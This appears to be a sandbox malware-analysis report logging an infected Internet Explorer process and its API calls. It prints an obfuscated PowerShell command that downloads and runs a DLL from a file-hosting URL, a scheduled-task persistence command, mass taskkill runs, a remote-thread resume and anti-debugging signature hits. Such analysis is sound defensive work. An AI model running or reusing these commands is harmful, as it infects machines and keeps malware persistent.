heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefe064000
process_handle: 0xffffffffffffffff
1 0 0
Application Crash Process iexplore.exe with pid 2220 crashed
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefdcfa49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7feff2373c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff6d43bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7feff255295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7feff252799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7feff2faf1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7feff2fb76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7feff2548d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff800883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff800ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff800c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff6ba4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff6cd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff80347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff80122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff803542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff6cd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff6cd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77569bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x775698da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff6cd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff7f3e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff6a0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff6a0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x772e652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7767c521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefdcfa49d
registers.r14: 0
registers.r15: 0
registers.rcx: 99410128
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 99416080
registers.r11: 99411888
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1922348528
registers.r13: 0
1 0 0
file C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline schtasks /create /sc MINUTE /mo 96 /tn microWord /F /tr """C:\ProgramData\ddond.com""""""https://www.mediafire.com/file/jed71s95wqiens1/11.htm/file"""
cmdline "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 96 /tn microWord /F /tr """C:\ProgramData\ddond.com""""""https://www.mediafire.com/file/jed71s95wqiens1/11.htm/file"""
cmdline powershell $MMMMMMM=((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+'.'+'W'+'eb'+'c'+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+''+''+''+''+''+''+''+''+''+'o'+'w'+'n'+''+''+''+''+''+''+''+''+''+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).invoke((('https://www.mediafire.com/file/cqbvjh2mo0z6x96/11.dll/file'))));Invoke-Expression $MMMMMMM
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $MMMMMMM=((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+'.'+'W'+'eb'+'c'+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+''+''+''+''+''+''+''+''+''+'o'+'w'+'n'+''+''+''+''+''+''+''+''+''+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).invoke((('https://www.mediafire.com/file/cqbvjh2mo0z6x96/11.dll/file'))));Invoke-Expression $MMMMMMM
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "cvtres.exe")
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "RegAsm.exe")
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "aspnet_regbrowsers.exe")
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msbuild.exe")
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "csc.exe")
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "CasPol.exe")
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "RegSvcs.exe")
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "vbc.exe")
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "aspnet_compiler.exe")
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "aspnet_regiis.exe")
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "InstallUtil.exe")
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "jsc.exe")
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: $MMMMMMM=((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+'.'+'W'+'eb'+'c'+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+''+''+''+''+''+''+''+''+''+'o'+'w'+'n'+''+''+''+''+''+''+''+''+''+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).invoke((('https://www.mediafire.com/file/cqbvjh2mo0z6x96/11.dll/file'))));Invoke-Expression $MMMMMMM
filepath: powershell
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: schtasks
parameters: /create /sc MINUTE /mo 96 /tn microWord /F /tr """C:\ProgramData\ddond.com""""""https://www.mediafire.com/file/jed71s95wqiens1/11.htm/file"""
filepath: schtasks
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: taskkill
parameters: /f /im aspnet_compiler.exe
filepath: taskkill
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: taskkill
parameters: /f /im RegAsm.exe
filepath: taskkill
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: taskkill
parameters: /f /im InstallUtil.exe
filepath: taskkill
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: taskkill
parameters: /f /im cvtres.exe
filepath: taskkill
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: taskkill
parameters: /f /im vbc.exe
filepath: taskkill
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: taskkill
parameters: /f /im msbuild.exe
filepath: taskkill
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: taskkill
parameters: /f /im csc.exe
filepath: taskkill
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: taskkill
parameters: /f /im CasPol.exe
filepath: taskkill
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: taskkill
parameters: /f /im jsc.exe
filepath: taskkill
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: taskkill
parameters: /f /im RegAsm.exe
filepath: taskkill
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: taskkill
parameters: /f /im RegSvcs.exe
filepath: taskkill
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: taskkill
parameters: /f /im aspnet_regiis.exe
filepath: taskkill
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: taskkill
parameters: /f /im aspnet_regbrowsers.exe
filepath: taskkill
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received [
Data received Wb…‰mrÃrI„Å%„Ât—R G?˜$DOWNGRD ށé¸E ?Žeȱ؍—^âžÅîƒ]õ£•Àÿ 
Data received ”
Data received K
Data received GAtì÷q- ‡‰FÓïÃÙÜn=ÞWôd5×—o»QÍì“{mð„škz©F -#´ a k÷€ÿ%$]á á=PI˜fÈñ÷pºÄ-䥠Ö¿|+oÌϼ´!5Œ;¹À\½U7Ñé­Áë5·ûçrÖß=/œ9ŸWæ0¼£m\$¼¦zY°ßê)ÔSÖ´&@2ÿ˜On‘1Rê’Ëk3aýâšm´N`MÀV\uÙøÿÝ#T÷ËÈz‘]“¿•‘œPè# B÷íŽ º9 EÙükÞûÅTn[•Ngñ†%!Ûu/ƒnµ-Cò¬²Ü¦1›¯Â*¾kãˆ))»,—2ºEã~cO¼«ñ\[þñkoâ$EkÜL掝ܞ÷¨ [ËÈèÍB^q¬Töz"`Í7!ÜNÃø²8žö?Ü
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received F\y[zç ~Ô‘Öá\” )¡Ú-GÙv@»ža€o®…­ Duˆ–ø´
Data received À
Data received ™/£ÇcBcN¬fG¶HÑPýT/{ìe²ƒëø{³ÁmÇÎûuTz›EY}oËí–ê¨Ã/6D¬ëؒq|HvÒꘇ4ãRÀÀœ…ŽlssXvUVòÚÏÈÈÎp"ÖDø=$>{£Å\"cŽÖŽ\O„<àm„ ë¥Â|åǸ®}x°?éBfüÈü/V;ÂBAˆ:‚ò A¤À6Ãÿ¨Øç,ØÿKå‹ ä:ÁeuéVþ]ÐÀRZ2·iMœT^Íy=:y£ÛÒ]þl'ÁÃXâ©ï(ÙT¨Ñg‰µ]ضž”DÄâí)@ÄX¦—å¦Bˆ3`¿oÊ\ %ú°©O۝ ¸Á~x‡|™«*½¹|Gó þ’ ¿RÁ÷$âÈ·ÍóõÇOD“‘r6%ÌÍùå¾ïðnÁÍâŠh,î^xå>Ó hÀ‰h^Ïô’yõäj‘ÏÎ%AÎw°ô‹·>AkÃo0lÐ&ürP-œzKÀÆúoOäDñS[š{™ÈŒ­²Ö^ƒí¦,ȳ*2áY¨¶fpÃÆËïÀU¹ r!µîtªË––'õWðÁm±':¼+5¶¸ ‡$03;ȑ‰0Hûzzߎ&E Ïê93#ÊC#ºØ´ >¤âÞO¬äÇx‰oO©Ûϱy×NÊp…öôRùÛ ”ÜòßVµ¹‘o¡!¯}‘0C´{ÂU–湁Âe‹Ì_ÀðÜÓG[#@ÿ’.•˜_ý󝸁>ãÂvY¥€–+qmá"*A%*Asr ×ÉZ² \Æ­³¯Ÿô3$ù¹« ¢xÚϵ¥Þg…ïaŽaP´g,6Zû‚Ó–SoRÿüFÆ(ƒé¡±_6èÉÃ1rÂK  Ö±o~nÕê,¬ì.µZ‹v·ÙŒ.Zx'ò™~¯lC¥mv…p$ùŽPîý¹SB›jÊQ;=xm§sûˆ^É>M'?ï¾ÉVÔœ—+и@»æ@ðÖDQ#/Â; ÀŽ,F¶”Zy ‘¬>lá’b²<õ톚8h ÷›½‚ uæJEø枅z SÞCé*‘÷­)H“1“€‹÷FR¥4ú7¬ £¿%žÓý€Ï 0{ªnMìÄy¦=,õ–îMæ+êB€½ …Fƒ³u/' ½L’ ®„öŠÎ…BÊRµ~Àñø!³ kñÒÁS\íµ¸Ç\~å™҈>wG‡D ‘-…N¬› i瓘Hô¿G* …ñؚŸ%¹×úa5ÑyŸ”¼ŠÄ¨ê"Qz|£œ=ðW¸r3 o4V•¨‡?¤ò‘xiŒlÒ=«6ÍnœFEy2e À†tÁ‡+>¬’ŽZpÄrÌeÛþM­¾ &À&üèªn äÀXôQ>)úvxkŽÎäím\{u;<É+7±»;ÄÌe ÈéƒMø:ÁArŸ.]]^ãë¬îÎÈÐøûÛhÍÅ6–²¹¼ø„÷4µ .äE궔2üí2_h©žYw .0AÈß­$ה–¸i8ÚÉ¢ôjô$uùeNŠsù!®¦Ñ¨e|mÁüý{Ý·àœVôjÄú25²$÷?÷•õyK,”H,
Data received 
Data received F
Data sent tpb…‰m~KˆZ|2§ #ëô—ËKŒÈŒ Qã×cjäN/5 ÀÀÀ À 28/ÿwww.mediafire.com  
Data sent FBAƒ‚~ê±¾oÄÊỏrÒªþŒ‡!P­àªÌ(ßÑ´òÿzÌf¹j×Zu!P˜`Ä'V;ÓÖíî0|óIíZ=uj¹0a®RÜò•}3Z)ÒS 'â¿¿é¬:¾2¸½<2)ï Y¢0€ô^
Data sent €ñ†nžx؉òy±Mçi­Z-ž7š§§.R¸UzÃ5 nh ôd|©†]û¨s°}i#)¼zsL;’=>æNTE¼áÚd8™Hŭljý}»A~7ÛÉ£jX¤é,^·QâØW•:'»£/Pñ$|IÔór^ˤ\LqþÅVß^¡
Data sent }yb…‰t¹ÕOß¹è”ÕÕBÉ¥±_>“P#q¬eh.hÅ/5 ÀÀÀ À 288ÿdownload2273.mediafire.com  
Data sent }yb…‰uñ ¸Â"¡ÆŽÑX¼"bòü‡%³2‘Ó¨’1l/5 ÀÀÀ À 288ÿdownload2273.mediafire.com  
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline schtasks /create /sc MINUTE /mo 96 /tn microWord /F /tr """C:\ProgramData\ddond.com""""""https://www.mediafire.com/file/jed71s95wqiens1/11.htm/file"""
cmdline taskkill /f /im aspnet_regbrowsers.exe
cmdline "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2220 CREDAT:145409
cmdline taskkill /f /im csc.exe
cmdline "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 96 /tn microWord /F /tr """C:\ProgramData\ddond.com""""""https://www.mediafire.com/file/jed71s95wqiens1/11.htm/file"""
cmdline "C:\Windows\System32\taskkill.exe" /f /im csc.exe
cmdline "C:\Windows\System32\taskkill.exe" /f /im jsc.exe
cmdline taskkill /f /im InstallUtil.exe
cmdline "C:\Windows\System32\taskkill.exe" /f /im InstallUtil.exe
cmdline taskkill /f /im jsc.exe
cmdline taskkill /f /im msbuild.exe
cmdline "C:\Windows\System32\taskkill.exe" /f /im cvtres.exe
cmdline taskkill /f /im RegSvcs.exe
cmdline "C:\Windows\System32\taskkill.exe" /f /im vbc.exe
cmdline taskkill /f /im aspnet_compiler.exe
cmdline "C:\Windows\System32\taskkill.exe" /f /im aspnet_regbrowsers.exe
cmdline taskkill /f /im aspnet_regiis.exe
cmdline "C:\Windows\System32\taskkill.exe" /f /im RegAsm.exe
cmdline "C:\Windows\System32\taskkill.exe" /f /im CasPol.exe
cmdline taskkill /f /im CasPol.exe
cmdline taskkill /f /im RegAsm.exe
cmdline taskkill /f /im cvtres.exe
cmdline "C:\Windows\System32\taskkill.exe" /f /im msbuild.exe
cmdline taskkill /f /im vbc.exe
cmdline "C:\Windows\System32\taskkill.exe" /f /im aspnet_regiis.exe
cmdline "C:\Windows\System32\taskkill.exe" /f /im RegSvcs.exe
cmdline "C:\Windows\System32\taskkill.exe" /f /im aspnet_compiler.exe
host 117.18.232.200
cmdline schtasks /create /sc MINUTE /mo 96 /tn microWord /F /tr """C:\ProgramData\ddond.com""""""https://www.mediafire.com/file/jed71s95wqiens1/11.htm/file"""
cmdline "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 96 /tn microWord /F /tr """C:\ProgramData\ddond.com""""""https://www.mediafire.com/file/jed71s95wqiens1/11.htm/file"""
parent_process iexplore.exe martian_process powershell $MMMMMMM=((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+'.'+'W'+'eb'+'c'+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+''+''+''+''+''+''+''+''+''+'o'+'w'+'n'+''+''+''+''+''+''+''+''+''+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).invoke((('https://www.mediafire.com/file/cqbvjh2mo0z6x96/11.dll/file'))));Invoke-Expression $MMMMMMM
Time & API Arguments Status Return Repeated

send

 buffer: tpb…‰m~KˆZ|2§ #ëô—ËKŒÈŒ Qã×cjäN/5 ÀÀÀ À 28/ÿwww.mediafire.com  
socket: 1252
sent: 121
1 121 0

send

 buffer: FBAƒ‚~ê±¾oÄÊỏrÒªþŒ‡!P­àªÌ(ßÑ´òÿzÌf¹j×Zu!P˜`Ä'V;ÓÖíî0|óIíZ=uj¹0a®RÜò•}3Z)ÒS 'â¿¿é¬:¾2¸½<2)ï Y¢0€ô^
socket: 1252
sent: 134
1 134 0

send

 buffer: €ñ†nžx؉òy±Mçi­Z-ž7š§§.R¸UzÃ5 nh ôd|©†]û¨s°}i#)¼zsL;’=>æNTE¼áÚd8™Hŭljý}»A~7ÛÉ£jX¤é,^·QâØW•:'»£/Pñ$|IÔór^ˤ\LqþÅVß^¡
socket: 1252
sent: 133
1 133 0

send

 buffer: }yb…‰t¹ÕOß¹è”ÕÕBÉ¥±_>“P#q¬eh.hÅ/5 ÀÀÀ À 288ÿdownload2273.mediafire.com  
socket: 1760
sent: 130
1 130 0

send

 buffer: }yb…‰uñ ¸Â"¡ÆŽÑX¼"bòü‡%³2‘Ó¨’1l/5 ÀÀÀ À 288ÿdownload2273.mediafire.com  
socket: 1760
sent: 130
1 130 0
parent_process iexplore.exe martian_process schtasks /create /sc MINUTE /mo 96 /tn microWord /F /tr """C:\ProgramData\ddond.com""""""https://www.mediafire.com/file/jed71s95wqiens1/11.htm/file"""
parent_process iexplore.exe martian_process taskkill /f /im aspnet_regbrowsers.exe
parent_process iexplore.exe martian_process taskkill /f /im csc.exe
parent_process iexplore.exe martian_process "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 96 /tn microWord /F /tr """C:\ProgramData\ddond.com""""""https://www.mediafire.com/file/jed71s95wqiens1/11.htm/file"""
parent_process iexplore.exe martian_process "C:\Windows\System32\taskkill.exe" /f /im csc.exe
parent_process iexplore.exe martian_process "C:\Windows\System32\taskkill.exe" /f /im jsc.exe
parent_process iexplore.exe martian_process taskkill /f /im InstallUtil.exe
parent_process iexplore.exe martian_process "C:\Windows\System32\taskkill.exe" /f /im InstallUtil.exe
parent_process iexplore.exe martian_process taskkill /f /im jsc.exe
parent_process iexplore.exe martian_process taskkill /f /im msbuild.exe
parent_process iexplore.exe martian_process "C:\Windows\System32\taskkill.exe" /f /im cvtres.exe
parent_process iexplore.exe martian_process taskkill /f /im RegSvcs.exe
parent_process iexplore.exe martian_process "C:\Windows\System32\taskkill.exe" /f /im vbc.exe
parent_process iexplore.exe martian_process taskkill /f /im aspnet_compiler.exe
parent_process iexplore.exe martian_process "C:\Windows\System32\taskkill.exe" /f /im aspnet_regbrowsers.exe
parent_process iexplore.exe martian_process powershell $MMMMMMM=((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+'.'+'W'+'eb'+'c'+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+''+''+''+''+''+''+''+''+''+'o'+'w'+'n'+''+''+''+''+''+''+''+''+''+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).invoke((('https://www.mediafire.com/file/cqbvjh2mo0z6x96/11.dll/file'))));Invoke-Expression $MMMMMMM
parent_process iexplore.exe martian_process taskkill /f /im aspnet_regiis.exe
parent_process iexplore.exe martian_process "C:\Windows\System32\taskkill.exe" /f /im RegAsm.exe
parent_process iexplore.exe martian_process "C:\Windows\System32\taskkill.exe" /f /im CasPol.exe
parent_process iexplore.exe martian_process taskkill /f /im CasPol.exe
parent_process iexplore.exe martian_process taskkill /f /im RegAsm.exe
parent_process iexplore.exe martian_process taskkill /f /im cvtres.exe
parent_process iexplore.exe martian_process "C:\Windows\System32\taskkill.exe" /f /im msbuild.exe
parent_process iexplore.exe martian_process taskkill /f /im vbc.exe
parent_process iexplore.exe martian_process "C:\Windows\System32\taskkill.exe" /f /im aspnet_regiis.exe
parent_process iexplore.exe martian_process "C:\Windows\System32\taskkill.exe" /f /im RegSvcs.exe
parent_process iexplore.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $MMMMMMM=((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+'.'+'W'+'eb'+'c'+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+''+''+''+''+''+''+''+''+''+'o'+'w'+'n'+''+''+''+''+''+''+''+''+''+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).invoke((('https://www.mediafire.com/file/cqbvjh2mo0z6x96/11.dll/file'))));Invoke-Expression $MMMMMMM
parent_process iexplore.exe martian_process "C:\Windows\System32\taskkill.exe" /f /im aspnet_compiler.exe
Process injection Process 2220 resumed a thread in remote process 2312
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x0000000000000360
suspend_count: 1
process_identifier: 2312
1 0 0
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe